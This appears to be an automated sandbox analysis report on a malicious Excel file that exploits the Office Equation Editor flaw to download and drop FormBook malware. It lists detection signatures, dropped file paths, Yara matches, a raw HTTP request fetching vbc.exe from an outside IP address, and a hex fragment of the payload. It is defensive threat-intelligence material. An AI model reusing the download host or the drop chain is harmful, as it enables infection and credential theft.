Windows Analysis Report Packing List.xlsx

Overview

General Information

Sample Name:	Packing List.xlsx
Analysis ID:	510251
MD5:	74c72f37e68bc3a8071467dd12bfaa7f
SHA1:	5dd9599fde86870f52169a85cfb76020f504e43c
SHA256:	de736eaf65c73f1aef5b09aa639d82e44129ac1300fd5411cab342e9e33faf7c
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Machine Learning detection for dropped file

Drops PE files to the user root directory

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: Packing List.xlsx	Virustotal: Detection: 32%			Perma Link
Source: Packing List.xlsx	ReversingLabs: Detection: 29%

Yara detected FormBook

Source: Yara match

File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 6.0.vbc.exe.1c0000.13.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.15.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.7.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.9.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.21.unpack	Avira: Label: W32/Delf.I
Source: 6.2.vbc.exe.1c0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 6.0.vbc.exe.1c0000.5.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.23.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.17.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.11.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.25.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.19.unpack	Avira: Label: W32/Delf.I
Source: 5.2.vbc.exe.30b0000.5.unpack	Avira: Label: W32/Delf.I

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000005.00000003.474355640.000000000F300000.00000004.00000001.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405E93 FindFirstFileA,FindClose,	5_2_00405E93
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004054BD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402671 FindFirstFileA,	5_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402671 FindFirstFileA,	6_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405E93 FindFirstFileA,FindClose,	6_2_00405E93
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	6_2_004054BD

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.227.228.38:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.227.228.38:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 47MB

Networking:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Oct 2021 11:38:05 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Wed, 27 Oct 2021 06:07:30 GMTETag: "39809-5cf4f68c9b908"Accept-Ranges: bytesContent-Length: 235529Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /0078/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.228.38Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38

Source: vbc.exe, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000005.00000000.468788902.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27DB9FE4.emf

Jump to behavior

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

5_2_00404FC2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match

File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 6.0.vbc.exe.1c0000.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.13.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.15.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.17.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.21.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.2.vbc.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.23.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.17.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.11.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.25.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.19.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.30b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.30b0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.476970202.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.476210300.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
